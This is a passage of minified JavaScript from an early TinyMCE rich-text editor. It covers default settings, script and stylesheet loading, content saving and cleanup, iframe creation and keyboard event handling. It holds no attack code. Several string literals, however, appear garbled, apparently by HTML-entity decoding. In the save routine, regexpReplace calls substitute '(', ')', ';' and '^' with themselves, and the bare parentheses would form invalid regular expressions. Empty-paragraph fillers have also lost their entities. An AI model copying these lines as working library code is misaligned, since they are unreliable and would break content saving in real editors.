i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var 